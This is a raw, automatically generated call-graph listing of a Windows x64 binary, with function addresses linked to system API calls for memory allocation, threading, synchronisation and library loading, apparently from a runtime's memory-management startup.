7ff774a057ec 15572->15574 15649 7ff774a0d7b0 15573->15649 15576 7ff774a05825 15574->15576 15577 7ff774a0d7b0 9 API calls 15574->15577 15578 7ff774a0587f 15576->15578 15626 7ff774a0df20 15576->15626 15577->15576 15634 7ff774a09f40 15578->15634 15581 7ff774a05884 15581->15562 15655 7ff774a05410 15581->15655 15591 7ff774a0b16e 15590->15591 15592 7ff774a0b040 15590->15592 15591->15563 15666 7ff774a13910 15592->15666 15594 7ff774a0b045 15595 7ff774a126b0 10 API calls 15594->15595 15596 7ff774a0b04a 15595->15596 15596->15591 15597 7ff774a0d7b0 9 API calls 15596->15597 15598 7ff774a0b072 15597->15598 15599 7ff774a0b09a GetCurrentProcess GetProcessAffinityMask 15598->15599 15600 7ff774a0b091 15598->15600 15602 7ff774a0b108 15598->15602 15599->15600 15601 7ff774a0b0e4 QueryInformationJobObject 15600->15601 15601->15602 15602->15563 15603->15565 15819 7ff774a68fd0 15604->15819 15607 7ff774a07164 15607->15567 15609 7ff774a07132 15609->15607 15610 7ff774a0b410 InitializeCriticalSectionEx 15609->15610 15611 7ff774a0715d 15610->15611 15611->15567 15613 7ff774a0b410 InitializeCriticalSectionEx 15612->15613 15614 7ff774a057a0 15613->15614 15614->15562 15615 7ff774a06b50 15614->15615 15616 7ff774a68fd0 _swprintf_c_l 3 API calls 15615->15616 15617 7ff774a06b6e 15616->15617 15618 7ff774a06c0a 15617->15618 15847 7ff774a04d60 15617->15847 15618->15571 15620 7ff774a06ba0 15621 7ff774a06bea 15620->15621 15854 7ff774a04e50 15620->15854 15621->15571 15623 7ff774a06bad 15625 7ff774a06bbd ISource 15623->15625 15858 7ff774a04be0 15623->15858 15625->15571 15627 7ff774a0df4b 15626->15627 15633 7ff774a0dff6 15626->15633 15628 7ff774a68fd0 _swprintf_c_l 3 API calls 15627->15628 15629 7ff774a0df6a 15628->15629 15630 7ff774a0b410 InitializeCriticalSectionEx 15629->15630 15631 7ff774a0df95 15630->15631 15632 7ff774a0dfde GetSystemTimeAsFileTime 15631->15632 15632->15633 15633->15578 15635 7ff774a689ab 15634->15635 15636 7ff774a09f79 EventRegister 15635->15636 15637 7ff774a09ffc 15636->15637 15640 7ff774a09ff7 15636->15640 15638 7ff774a0d7b0 9 API calls 15637->15638 15638->15640 15863 7ff774a0a820 15640->15863 15642 7ff774a0a074 15642->15581 15643 7ff774a0a04b 15643->15642 15881 7ff774a06960 15643->15881 15645 7ff774a0a054 15645->15642 15888 7ff774a0e9d0 15645->15888 15646 7ff774a0a064 15646->15581 15652 7ff774a0d820 15649->15652 15650 7ff774a0d8a0 _wcsicmp 15650->15652 15654 7ff774a0d8bd 15650->15654 15651 7ff774a68fb0 8 API calls 15653 7ff774a0d99d 15651->15653 15652->15650 15652->15654 15653->15574 15654->15651 15659 7ff774a0543a 15655->15659 15663 7ff774a0559b 15655->15663 15656 7ff774a05726 15656->15562 15664 7ff774a0b410 15656->15664 15657 7ff774a0b220 2 API calls 15658 7ff774a0571a RaiseFailFastException 15657->15658 15658->15656 15659->15663 16168 7ff774a0b1d0 LoadLibraryExW 15659->16168 15661 7ff774a05516 15661->15663 16171 7ff774a0b180 LoadLibraryExW 15661->16171 15663->15656 15663->15657 15665 7ff774a68bd9 InitializeCriticalSectionEx 15664->15665 15793 7ff774a09b90 15666->15793 15669 7ff774a09b90 9 API calls 15670 7ff774a1394e 15669->15670 15671 7ff774a09b90 9 API calls 15670->15671 15672 7ff774a13969 15671->15672 15673 7ff774a09b90 9 API calls 15672->15673 15674 7ff774a13984 15673->15674 15675 7ff774a09b90 9 API calls 15674->15675 15676 7ff774a139a4 15675->15676 15677 7ff774a09b90 9 API calls 15676->15677 15678 7ff774a139bf 15677->15678 15679 7ff774a09b90 9 API calls 15678->15679 15680 7ff774a139df 15679->15680 15681 7ff774a09b90 9 API calls 15680->15681 15682 7ff774a139fa 15681->15682 15683 7ff774a09b90 9 API calls 15682->15683 15684 7ff774a13a15 15683->15684 15685 7ff774a09b90 9 API calls 15684->15685 15686 7ff774a13a30 15685->15686 15687 7ff774a09b90 9 API calls 15686->15687 15688 7ff774a13a50 15687->15688 15689 7ff774a09b90 9 API calls 15688->15689 15690 7ff774a13a70 15689->15690 15799 7ff774a09d50 15690->15799 15693 7ff774a09d50 9 API calls 15694 7ff774a13aa0 15693->15694 15695 7ff774a09d50 9 API calls 15694->15695 15696 7ff774a13ab5 15695->15696 15697 7ff774a09d50 9 API calls 15696->15697 15698 7ff774a13aca 15697->15698 15699 7ff774a09d50 9 API calls 15698->15699 15700 7ff774a13adf 15699->15700 15701 7ff774a09d50 9 API calls 15700->15701 15702 7ff774a13af9 15701->15702 15703 7ff774a09d50 9 API calls 15702->15703 15704 7ff774a13b0e 15703->15704 15705 7ff774a09d50 9 API calls 15704->15705 15706 7ff774a13b23 15705->15706 15707 7ff774a09d50 9 API calls 15706->15707 15708 7ff774a13b38 15707->15708 15709 7ff774a09d50 9 API calls 15708->15709 15710 7ff774a13b4d 15709->15710 15711 7ff774a09d50 9 API calls 15710->15711 15712 7ff774a13b62 15711->15712 15713 7ff774a09d50 9 API calls 15712->15713 15714 7ff774a13b77 15713->15714 15715 7ff774a09d50 9 API calls 15714->15715 15716 7ff774a13b91 15715->15716 15717 7ff774a09d50 9 API calls 15716->15717 15718 7ff774a13bab 15717->15718 15719 7ff774a09d50 9 API calls 15718->15719 15720 7ff774a13bc0 15719->15720 15721 7ff774a09d50 9 API calls 15720->15721 15722 7ff774a13bd5 15721->15722 15723 7ff774a09d50 9 API calls 15722->15723 15724 7ff774a13bea 15723->15724 15725 7ff774a09d50 9 API calls 15724->15725 15726 7ff774a13bff 15725->15726 15727 7ff774a09d50 9 API calls 15726->15727 15728 7ff774a13c19 15727->15728 15729 7ff774a09d50 9 API calls 15728->15729 15730 7ff774a13c33 15729->15730 15731 7ff774a09d50 9 API calls 15730->15731 15732 7ff774a13c48 15731->15732 15733 7ff774a09d50 9 API calls 15732->15733 15734 7ff774a13c5d 15733->15734 15735 7ff774a09d50 9 API calls 15734->15735 15736 7ff774a13c72 15735->15736 15737 7ff774a09d50 9 API calls 15736->15737 15738 7ff774a13c87 15737->15738 15739 7ff774a09d50 9 API calls 15738->15739 15740 7ff774a13c9c 15739->15740 15741 7ff774a09d50 9 API calls 15740->15741 15742 7ff774a13cb1 15741->15742 15743 7ff774a09d50 9 API calls 15742->15743 15744 7ff774a13cc6 15743->15744 15745 7ff774a09d50 9 API calls 15744->15745 15746 7ff774a13cdb 15745->15746 15747 7ff774a09d50 9 API calls 15746->15747 15748 7ff774a13cf0 15747->15748 15749 7ff774a09d50 9 API calls 15748->15749 15750 7ff774a13d05 15749->15750 15751 7ff774a09d50 9 API calls 15750->15751 15752 7ff774a13d1a 15751->15752 15753 7ff774a09d50 9 API calls 15752->15753 15754 7ff774a13d2f 15753->15754 15755 7ff774a09d50 9 API calls 15754->15755 15756 7ff774a13d44 15755->15756 15757 7ff774a09d50 9 API calls 15756->15757 15758 7ff774a13d59 15757->15758 15759 7ff774a09d50 9 API calls 15758->15759 15760 7ff774a13d6e 15759->15760 15761 7ff774a09d50 9 API calls 15760->15761 15762 7ff774a13d83 15761->15762 15763 7ff774a09d50 9 API calls 15762->15763 15764 7ff774a13d98 15763->15764 15765 7ff774a09d50 9 API calls 15764->15765 15766 7ff774a13dad 15765->15766 15767 7ff774a09d50 9 API calls 15766->15767 15768 7ff774a13dc2 15767->15768 15769 7ff774a09d50 9 API calls 15768->15769 15770 7ff774a13dd7 15769->15770 15771 7ff774a09d50 9 API calls 15770->15771 15772 7ff774a13dec 15771->15772 15773 7ff774a09d50 9 API calls 15772->15773 15774 7ff774a13e01 15773->15774 15775 7ff774a09d50 9 API calls 15774->15775 15776 7ff774a13e16 15775->15776 15777 7ff774a09d50 9 API calls 15776->15777 15778 7ff774a13e30 15777->15778 15779 7ff774a09d50 9 API calls 15778->15779 15780 7ff774a13e4a 15779->15780 15781 7ff774a09d50 9 API calls 15780->15781 15782 7ff774a13e64 15781->15782 15783 7ff774a09d50 9 API calls 15782->15783 15784 7ff774a13e7e 15783->15784 15785 7ff774a09d50 9 API calls 15784->15785 15786 7ff774a13e98 15785->15786 15787 7ff774a09d50 9 API calls 15786->15787 15788 7ff774a13eb2 15787->15788 15789 7ff774a09d50 9 API calls 15788->15789 15790 7ff774a13ec7 15789->15790 15791 7ff774a09d50 9 API calls 15790->15791 15792 7ff774a13ee1 15791->15792 15798 7ff774a09bc3 15793->15798 15796 7ff774a0d7b0 9 API calls 15797 7ff774a09bc7 15796->15797 15805 7ff774a68fb0 15797->15805 15798->15796 15798->15797 15798->15798 15803 7ff774a09d80 15799->15803 15800 7ff774a0d7b0 9 API calls 15801 7ff774a09e98 15800->15801 15802 7ff774a68fb0 8 API calls 15801->15802 15804 7ff774a09eb0 15802->15804 15803->15800 15804->15693 15806 7ff774a68fb9 15805->15806 15807 7ff774a09cfe 15806->15807 15808 7ff774a69abc IsProcessorFeaturePresent 15806->15808 15807->15669 15809 7ff774a69ad4 15808->15809 15814 7ff774a69b90 RtlCaptureContext 15809->15814 15815 7ff774a69baa RtlLookupFunctionEntry 15814->15815 15816 7ff774a69ae7 15815->15816 15817 7ff774a69bc0 RtlVirtualUnwind 15815->15817 15818 7ff774a69a88 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 15816->15818 15817->15815 15817->15816 15825 7ff774a68ed4 15819->15825 15822 7ff774a0fdc0 15823 7ff774a0b410 InitializeCriticalSectionEx 15822->15823 15824 7ff774a0fe0c 15823->15824 15824->15609 15826 7ff774a68eee malloc 15825->15826 15827 7ff774a07125 15826->15827 15828 7ff774a68edf 15826->15828 15827->15607 15827->15822 15828->15826 15829 7ff774a68efe 15828->15829 15832 7ff774a68f09 15829->15832 15834 7ff774a69a2c 15829->15834 15838 7ff774a69a4c 15832->15838 15835 7ff774a69a3a std::bad_alloc::bad_alloc 15834->15835 15842 7ff774a6a8e0 15835->15842 15837 7ff774a69a4b 15839 7ff774a69a5a std::bad_alloc::bad_alloc 15838->15839 15840 7ff774a6a8e0 Concurrency::cancel_current_task 2 API calls 15839->15840 15841 7ff774a68f0f 15840->15841 15843 7ff774a6a8ff 15842->15843 15844 7ff774a6a94a RaiseException 15843->15844 15845 7ff774a6a928 RtlPcToFileHeader 15843->15845 15844->15837 15846 7ff774a6a940 15845->15846 15846->15844 15848 7ff774a68fd0 _swprintf_c_l 3 API calls 15847->15848 15849 7ff774a04d7e 15848->15849 15850 7ff774a0b410 InitializeCriticalSectionEx 15849->15850 15852 7ff774a04db0 15849->15852 15850->15852 15853 7ff774a04e08 ISource 15852->15853 15861 7ff774a0b3f0 15852->15861 15853->15620 15855 7ff774a04e55 15854->15855 15857 7ff774a04e66 ISource 15854->15857 15856 7ff774a0b3f0 DeleteCriticalSection 15855->15856 15856->15857 15857->15623 15859 7ff774a0b3f0 15858->15859 15859->15625 15860 7ff774a68a4d DeleteCriticalSection 15859->15860 15861->15853 15862 7ff774a68a4d DeleteCriticalSection 15861->15862 15898 7ff774a11d60 15863->15898 15865 7ff774a0a037 15865->15642 15866 7ff774a19140 15865->15866 15909 7ff774a0e020 15866->15909 15870 7ff774a1915e 15872 7ff774a191d9 15870->15872 15916 7ff774a12260 15870->15916 15880 7ff774a1944b ISource 15872->15880 15930 7ff774a2f640 15872->15930 15874 7ff774a1964c 15875 7ff774a68fd0 _swprintf_c_l 3 API calls 15874->15875 15874->15880 15876 7ff774a19782 15875->15876 15876->15880 15953 7ff774a11eb0 15876->15953 15878 7ff774a197ad 15958 7ff774a2de20 15878->15958 15880->15643 15882 7ff774a06972 15881->15882 15883 7ff774a069ad 15882->15883 16145 7ff774a0fc70 CreateEventW 15882->16145 15883->15645 15885 7ff774a06984 15885->15883 16146 7ff774a0b320 CreateThread 15885->16146 15887 7ff774a069a3 15887->15645 15889 7ff774a0e9e7 15888->15889 15890 7ff774a0e9ef 15889->15890 15891 7ff774a68fd0 _swprintf_c_l 3 API calls 15889->15891 15890->15646 15895 7ff774a0ea21 15891->15895 15892 7ff774a0eb58 ISource 15892->15646 15894 7ff774a0eaf2 ISource 15894->15646 15895->15892 15896 7ff774a0eab5 ISource 15895->15896 16149 7ff774a14350 15895->16149 15896->15894 16155 7ff774a145e0 15896->16155 15903 7ff774a14c20 15898->15903 15902 7ff774a11d9f 15902->15865 15904 7ff774a68fd0 _swprintf_c_l 3 API calls 15903->15904 15905 7ff774a11d88 15904->15905 15905->15902 15906 7ff774a16770 15905->15906 15907 7ff774a68fd0 _swprintf_c_l 3 API calls 15906->15907 15908 7ff774a16785 15907->15908 15908->15902 15910 7ff774a0e0cc 15909->15910 15913 7ff774a0e05b 15909->15913 15915 7ff774a128a0 QueryPerformanceFrequency 15910->15915 15911 7ff774a0e094 15911->15910 15989 7ff774a0e0e0 15911->15989 15913->15910 15913->15911 15981 7ff774a0dd40 15913->15981 15915->15870 15917 7ff774a12283 15916->15917 15918 7ff774a12297 GetCurrentProcess IsProcessInJob 15917->15918 15924 7ff774a123d4 15917->15924 15921 7ff774a122ec 15918->15921 15922 7ff774a12393 15918->15922 15919 7ff774a12418 15926 7ff774a68fb0 8 API calls 15919->15926 15920 7ff774a12422 GlobalMemoryStatusEx 15920->15919 15921->15922 15925 7ff774a122f6 QueryInformationJobObject 15921->15925 15923 7ff774a123ab GlobalMemoryStatusEx 15922->15923 15922->15924 15923->15924 15924->15919 15924->15920 15925->15922 15927 7ff774a12318 15925->15927 15929 7ff774a12464 15926->15929 15927->15922 15928 7ff774a1235c GlobalMemoryStatusEx 15927->15928 15928->15922 15929->15872 15998 7ff774a128f0 VirtualAlloc 15930->15998 15932 7ff774a2f662 15933 7ff774a2f6c7 15932->15933 16074 7ff774a12690 InitializeCriticalSection 15932->16074 15934 7ff774a2fabd 15933->15934 16001 7ff774a40410 15933->16001 15937 7ff774a2f6f1 _swprintf_c_l 15952 7ff774a2f933 15937->15952 16011 7ff774a2f340 15937->16011 15939 7ff774a2f8c8 16015 7ff774a2ce10 15939->16015 15943 7ff774a2f902 15943->15952 16022 7ff774a2fae0 15943->16022 15946 7ff774a2f928 16075 7ff774a129e0 VirtualFree 15946->16075 15948 7ff774a2f957 15948->15952 16036 7ff774a430a0 15948->16036 15952->15874 15954 7ff774a68fd0 _swprintf_c_l 3 API calls 15953->15954 15955 7ff774a11ed6 15954->15955 15956 7ff774a11ede CreateEventW 15955->15956 15957 7ff774a11f00 ISource 15955->15957 15956->15957 15957->15878 15959 7ff774a2deaa _swprintf_c_l 15958->15959 15960 7ff774a11eb0 4 API calls 15959->15960 15961 7ff774a2deb8 15960->15961 15980 7ff774a2e717 15961->15980 16123 7ff774a12880 QueryPerformanceCounter 15961->16123 15964 7ff774a2ded6 15965 7ff774a2e246 15964->15965 15964->15980 16124 7ff774a31660 15964->16124 15966 7ff774a31660 9 API calls 15965->15966 15967 7ff774a2e279 15966->15967 15968 7ff774a31660 9 API calls 15967->15968 15967->15980 15969 7ff774a2e2b8 15968->15969 15970 7ff774a68fd0 _swprintf_c_l 3 API calls 15969->15970 15969->15980 15971 7ff774a2e581 15970->15971 15972 7ff774a2e5cd 15971->15972 15973 7ff774a2e5e4 15971->15973 15971->15980 15975 7ff774a2e5da DebugBreak 15972->15975 15972->15980 15974 7ff774a68fd0 _swprintf_c_l 3 API calls 15973->15974 15976 7ff774a2e630 15974->15976 15975->15980 15977 7ff774a68fd0 _swprintf_c_l 3 API calls 15976->15977 15976->15980 15978 7ff774a2e6bd 15977->15978 15978->15980 16138 7ff774a12690 InitializeCriticalSection 15978->16138 15980->15880 15984 7ff774a0dd64 15981->15984 15982 7ff774a68fd0 _swprintf_c_l 3 API calls 15983 7ff774a0ddcd 15982->15983 15985 7ff774a68fd0 _swprintf_c_l 3 API calls 15983->15985 15988 7ff774a0de85 ISource 15983->15988 15984->15982 15986 7ff774a0ddf8 15984->15986 15985->15986 15986->15988 15993 7ff774a0aea0 GetCurrentThreadId 15986->15993 15988->15911 15990 7ff774a0e135 15989->15990 15992 7ff774a0e13c 15989->15992 15994 7ff774a0db70 15990->15994 15992->15910 15993->15988 15995 7ff774a0db9a _swprintf_c_l 15994->15995 15996 7ff774a0dbc1 15995->15996 15997 7ff774a68fd0 _swprintf_c_l 3 API calls 15995->15997 15996->15992 15997->15996 15999 7ff774a12929 15998->15999 16000 7ff774a12911 VirtualFree 15998->16000 15999->15932 16000->15932 16002 7ff774a4043f 16001->16002 16003 7ff774a4046c 16002->16003 16004 7ff774a40462 16002->16004 16009 7ff774a40497 16002->16009 16006 7ff774a12a00 3 API calls 16003->16006 16076 7ff774a12a80 16004->16076 16008 7ff774a4047d 16006->16008 16008->16009 16087 7ff774a129e0 VirtualFree 16008->16087 16009->15937 16013 7ff774a2f35f 16011->16013 16014 7ff774a2f37c 16013->16014 16088 7ff774a11f70 16013->16088 16014->15939 16016 7ff774a2ce32 16015->16016 16017 7ff774a68fb0 8 API calls 16016->16017 16018 7ff774a2cf53 16017->16018 16019 7ff774a12a00 16018->16019 16020 7ff774a12a44 GetCurrentProcess VirtualAllocExNuma 16019->16020 16021 7ff774a12a25 VirtualAlloc 16019->16021 16020->15943 16021->16020 16026 7ff774a2fb0e 16022->16026 16023 7ff774a68fb0 8 API calls 16024 7ff774a2f924 16023->16024 16024->15946 16024->15948 16025 7ff774a2fec3 EnterCriticalSection 16025->16026 16028 7ff774a2fef0 LeaveCriticalSection 16025->16028 16026->16025 16027 7ff774a2fb18 16026->16027 16026->16028 16030 7ff774a2ffe1 LeaveCriticalSection 16026->16030 16031 7ff774a2ffb7 16026->16031 16095 7ff774a12930 16026->16095 16027->16023 16028->16026 16033 7ff774a2ffed 16030->16033 16032 7ff774a2ffc0 EnterCriticalSection 16031->16032 16031->16033 16032->16030 16033->16027 16035 7ff774a30025 EnterCriticalSection LeaveCriticalSection 16033->16035 16098 7ff774a129c0 VirtualFree 16033->16098 16035->16033 16099 7ff774a42fb0 16036->16099 16039 7ff774a2ed00 16045 7ff774a2ed30 16039->16045 16040 7ff774a2f31d 16043 7ff774a2f332 16040->16043 16044 7ff774a2f326 16040->16044 16041 7ff774a2f311 16121 7ff774a11e10 CloseHandle 16041->16121 16043->15952 16122 7ff774a11e10 CloseHandle 16044->16122 16047 7ff774a11eb0 4 API calls 16045->16047 16072 7ff774a2ed8f 16045->16072 16048 7ff774a2edcf 16047->16048 16049 7ff774a11eb0 4 API calls 16048->16049 16048->16072 16050 7ff774a2ede5 _swprintf_c_l 16049->16050 16050->16072 16105 7ff774a12080 16050->16105 16052 7ff774a2f10a 16053 7ff774a11eb0 4 API calls 16052->16053 16054 7ff774a2f187 16053->16054 16055 7ff774a2f1c9 16054->16055 16056 7ff774a11eb0 4 API calls 16054->16056 16057 7ff774a2f2c9 16055->16057 16058 7ff774a2f2bd 16055->16058 16055->16072 16059 7ff774a2f19d 16056->16059 16061 7ff774a2f2de 16057->16061 16062 7ff774a2f2d2 16057->16062 16117 7ff774a11e10 CloseHandle 16058->16117 16059->16055 16112 7ff774a11e30 16059->16112 16063 7ff774a2f2e7 16061->16063 16064 7ff774a2f2f3 16061->16064 16118 7ff774a11e10 CloseHandle 16062->16118 16119 7ff774a11e10 CloseHandle 16063->16119 16067 7ff774a2f2fc 16064->16067 16064->16072 16120 7ff774a11e10 CloseHandle 16067->16120 16070 7ff774a2f1b3 16070->16055 16071 7ff774a11eb0 4 API calls 16070->16071 16071->16055 16072->16040 16072->16041 16073 7ff774a2f277 16072->16073 16073->15952 16074->15933 16075->15952 16077 7ff774a12aae LookupPrivilegeValueW 16076->16077 16078 7ff774a12b46 GetLargePageMinimum 16076->16078 16079 7ff774a12aca GetCurrentProcess OpenProcessToken 16077->16079 16080 7ff774a12b7f 16077->16080 16081 7ff774a12b83 GetCurrentProcess VirtualAllocExNuma 16078->16081 16082 7ff774a12b66 VirtualAlloc 16078->16082 16079->16080 16083 7ff774a12b01 AdjustTokenPrivileges GetLastError CloseHandle 16079->16083 16085 7ff774a68fb0 8 API calls 16080->16085 16081->16080 16082->16080 16083->16080 16084 7ff774a12b3b 16083->16084 16084->16078 16084->16080 16086 7ff774a12bb6 16085->16086 16086->16008 16087->16009 16089 7ff774a11f78 16088->16089 16090 7ff774a11f91 GetLogicalProcessorInformation 16089->16090 16094 7ff774a11fbd ISource 16089->16094 16091 7ff774a11fb2 GetLastError 16090->16091 16092 7ff774a11fc4 16090->16092 16091->16092 16091->16094 16093 7ff774a12001 GetLogicalProcessorInformation 16092->16093 16092->16094 16093->16094 16094->16014 16096 7ff774a1294b VirtualAlloc 16095->16096 16097 7ff774a1296e GetCurrentProcess VirtualAllocExNuma 16095->16097 16096->16026 16097->16026 16098->16033 16100 7ff774a42fc9 16099->16100 16102 7ff774a2fa9c 16099->16102 16101 7ff774a42fe4 LoadLibraryExW 16100->16101 16100->16102 16101->16102 16103 7ff774a43012 GetProcAddress 16101->16103 16102->16039 16104 7ff774a43027 16103->16104 16104->16102 16106 7ff774a120b7 GetCurrentProcess 16105->16106 16107 7ff774a1216f GlobalMemoryStatusEx 16105->16107 16108 7ff774a120d0 16106->16108 16110 7ff774a120d8 16107->16110 16108->16107 16108->16110 16109 7ff774a68fb0 8 API calls 16111 7ff774a12248 16109->16111 16110->16109 16111->16052 16113 7ff774a68fd0 _swprintf_c_l 3 API calls 16112->16113 16114 7ff774a11e56 16113->16114 16115 7ff774a11e5e CreateEventW 16114->16115 16116 7ff774a11e7e ISource 16114->16116 16115->16116 16116->16070 16117->16057 16118->16061 16119->16064 16120->16072 16121->16040 16122->16043 16123->15964 16127 7ff774a3168d 16124->16127 16125 7ff774a31767 16130 7ff774a317c1 16125->16130 16131 7ff774a12930 3 API calls 16125->16131 16126 7ff774a316e3 EnterCriticalSection 16129 7ff774a31700 16126->16129 16127->16125 16127->16126 16128 7ff774a317b1 LeaveCriticalSection 16132 7ff774a317bd 16128->16132 16129->16128 16134 7ff774a31745 LeaveCriticalSection 16129->16134 16139 7ff774a2e7a0 16130->16139 16135 7ff774a3178d 16131->16135 16132->15964 16134->16125 16135->16130 16136 7ff774a31791 16135->16136 16136->16132 16137 7ff774a3179b EnterCriticalSection 16136->16137 16137->16128 16138->15980 16141 7ff774a2e7d1 16139->16141 16140 7ff774a2e965 16140->16132 16141->16140 16142 7ff774a2e94f DebugBreak 16141->16142 16143 7ff774a2e954 16141->16143 16142->16143 16143->16140 16144 7ff774a2e960 DebugBreak 16143->16144 16144->16140 16145->15885 16147 7ff774a0b34f 16146->16147 16148 7ff774a0b355 SetThreadPriority ResumeThread FindCloseChangeNotification 16146->16148 16147->15887 16148->15887 16150 7ff774a14383 _swprintf_c_l 16149->16150 16154 7ff774a143a9 ISource _swprintf_c_l 16150->16154 16158 7ff774a15300 16150->16158 16152 7ff774a143a0 16153 7ff774a0b410 InitializeCriticalSectionEx 16152->16153 16152->16154 16153->16154 16154->15895 16154->16154 16156 7ff774a0b3f0 DeleteCriticalSection 16155->16156 16157 7ff774a145f2 16156->16157 16159 7ff774a12a00 3 API calls 16158->16159 16160 7ff774a15322 16159->16160 16161 7ff774a1532a 16160->16161 16162 7ff774a12930 3 API calls 16160->16162 16161->16152 16163 7ff774a15348 16162->16163 16166 7ff774a15353 _swprintf_c_l 16163->16166 16167 7ff774a129e0 VirtualFree 16163->16167 16165 7ff774a1546e 16165->16152 16166->16152 16167->16165 16169 7ff774a0b1ee GetProcAddress 16168->16169 16170 7ff774a0b203 16168->16170 16169->16170 16170->15661 16172 7ff774a0b19e GetProcAddress 16171->16172 16173 7ff774a0b1b3 16171->16173 16172->16173 16173->15663 16243 7ff774a09500 16244 7ff774a0951f 16243->16244 16245 7ff774a09542 16244->16245 16255 7ff774a0b2e0 CreateThread 16244->16255 16247 7ff774a09534 16248 7ff774a09549 16247->16248 16249 7ff774a0953d 16247->16249 16262 7ff774a0fcf0 16248->16262 16258 7ff774a0fc10 16249->16258 16252 7ff774a09559 16253 7ff774a0fc10 CloseHandle 16252->16253 16254 7ff774a09563 16253->16254 16256 7ff774a0b309 FindCloseChangeNotification 16255->16256 16257 7ff774a0b304 16255->16257 16256->16247 16257->16247 16259 7ff774a0fc1f 16258->16259 16260 7ff774a0fc34 16258->16260 16259->16260 16261 7ff774a0fc28 CloseHandle 16259->16261 16260->16245 16261->16260 16263 7ff774a0fd77 16262->16263 16264 7ff774a0fd1d 16262->16264 16263->16252 16265 7ff774a0fd9e 16264->16265 16267 7ff774a0fd58 16264->16267 16266 7ff774a0ad00 4 API calls 16265->16266 16266->16263 16269 7ff774a0ad00 16267->16269 16270 7ff774a0ad3c SetLastError CoWaitForMultipleHandles 16269->16270 16271 7ff774a0ad25 WaitForMultipleObjectsEx 16269->16271 16272 7ff774a0ad7e 16270->16272 16273 7ff774a0ad6a 16270->16273 16271->16272 16272->16263 16273->16272 16274 7ff774a0ad6e SetLastError 16273->16274 16274->16272 16275 7ff774a0fe40 16276 7ff774a0fe5a 16275->16276 16277 7ff774a0fe65 16275->16277 16278 7ff774a0fe92 VirtualAlloc 16277->16278 16283 7ff774a0fee6 16277->16283 16279 7ff774a0fecd 16278->16279 16278->16283 16280 7ff774a68fd0 _swprintf_c_l 3 API calls 16279->16280 16281 7ff774a0fede 16280->16281 16282 7ff774a0ff31 VirtualFree 16281->16282 16281->16283 16282->16283 16284 7ff774a09480 16285 7ff774a09498 16284->16285 16286 7ff774a0949f 16284->16286 16294 7ff774a04cc0 16285->16294 16300 7ff774a062a0 16286->16300 16289 7ff774a094bc 16309 7ff774a0fcc0 16289->16309 16291 7ff774a094cc 16312 7ff774a0e1d0 16291->16312 16295 7ff774a04ced 16294->16295 16296 7ff774a0acc0 3 API calls 16295->16296 16299 7ff774a04d0b 16295->16299 16297 7ff774a04d03 16296->16297 16318 7ff774a05920 16297->16318 16299->16286 16301 7ff774a06366 16300->16301 16302 7ff774a062b8 GetCurrentThreadId GetCurrentProcess GetCurrentThread DuplicateHandle 16300->16302 16301->16289 16303 7ff774a0aa30 VirtualQuery 16302->16303 16304 7ff774a0632c 16303->16304 16305 7ff774a0633a RaiseFailFastException 16304->16305 16306 7ff774a06347 16304->16306 16305->16306 16307 7ff774a0dcc0 4 API calls 16306->16307 16308 7ff774a0634f 16307->16308 16308->16289 16310 7ff774a0fcca 16309->16310 16311 7ff774a0fcd1 SetEvent 16309->16311 16310->16291 16311->16291 16314 7ff774a0e20a 16312->16314 16316 7ff774a0e22f _swprintf_c_l 16312->16316 16313 7ff774a094d6 16314->16313 16315 7ff774a0dd40 4 API calls 16314->16315 16315->16316 16316->16313 16317 7ff774a68fd0 _swprintf_c_l 3 API calls 16316->16317 16317->16316 16319 7ff774a0594f 16318->16319 16326 7ff774a0aa30 VirtualQuery 16319->16326 16322 7ff774a059a0 RaiseFailFastException 16323 7ff774a059ad 16322->16323 16328 7ff774a0dcc0 16323->16328 16325 7ff774a059b5 16325->16299 16327 7ff774a0599c 16326->16327 16327->16322 16327->16323 16329 7ff774a0dcd2 16328->16329 16330 7ff774a0dcda 16328->16330 16329->16325 16331 7ff774a0dd40 4 API calls 16330->16331 16332 7ff774a0dd25 16330->16332 16331->16332 16332->16325 16333 7ff774a0a7a1 16334 7ff774a0a7b3 16333->16334 16335 7ff774a0a774 16333->16335 16340 7ff774a1744e 16334->16340 16348 7ff774a175d1 16334->16348 16352 7ff774a17420 16334->16352 16336 7ff774a0a7d4 16341 7ff774a1748b 16340->16341 16342 7ff774a174b5 16340->16342 16344 7ff774a17494 DebugBreak 16341->16344 16345 7ff774a17499 16341->16345 16356 7ff774a1cf30 16342->16356 16344->16345 16345->16336 16347 7ff774a174d8 16347->16345 16369 7ff774a19e40 16347->16369 16349 7ff774a175b0 16348->16349 16349->16348 16350 7ff774a17499 16349->16350 16351 7ff774a19e40 3 API calls 16349->16351 16350->16336 16351->16350 16353 7ff774a17499 16352->16353 16355 7ff774a17592 16352->16355 16353->16336 16354 7ff774a19e40 3 API calls 16354->16353 16355->16353 16355->16354 16366 7ff774a1cf5f 16356->16366 16357 7ff774a40880 WaitForSingleObject 16357->16366 16359 7ff774a1d019 SwitchToThread 16359->16366 16361 7ff774a1d13b 16361->16347 16364 7ff774a23670 39 API calls 16364->16366 16365 7ff774a1d045 SwitchToThread 16365->16366 16366->16357 16366->16359 16366->16361 16366->16364 16366->16365 16367 7ff774a34b90 GetTickCount64 16366->16367 16368 7ff774a1d00d SwitchToThread 16366->16368 16376 7ff774a1dbe0 16366->16376 16396 7ff774a406c0 16366->16396 16410 7ff774a128e0 16366->16410 16413 7ff774a1d660 16366->16413 16367->16366 16368->16366 16371 7ff774a19e76 16369->16371 16374 7ff774a19eaf 16369->16374 16370 7ff774a19e89 SwitchToThread 16370->16371 16371->16370 16372 7ff774a128e0 SleepEx 16371->16372 16371->16374 16372->16371 16373 7ff774a19f85 ISource 16373->16345 16374->16373 16375 7ff774a19f80 DebugBreak 16374->16375 16375->16373 16377 7ff774a1ddd2 16376->16377 16378 7ff774a1dc1c 16376->16378 16381 7ff774a3ea80 6 API calls 16377->16381 16379 7ff774a1dc8d 16378->16379 16380 7ff774a1ddd7 16378->16380 16382 7ff774a1dc9c SwitchToThread 16379->16382 16380->16377 16427 7ff774a17080 16380->16427 16381->16377 16390 7ff774a1dcaa 16382->16390 16385 7ff774a1dd51 SwitchToThread 16385->16390 16387 7ff774a128e0 SleepEx 16387->16390 16390->16377 16390->16385 16390->16387 16393 7ff774a1dd7d SwitchToThread 16390->16393 16394 7ff774a1dd45 SwitchToThread 16390->16394 16423 7ff774a40880 16390->16423 16393->16390 16394->16390 16397 7ff774a40869 16396->16397 16398 7ff774a406dd 16396->16398 16397->16366 16399 7ff774a12080 10 API calls 16398->16399 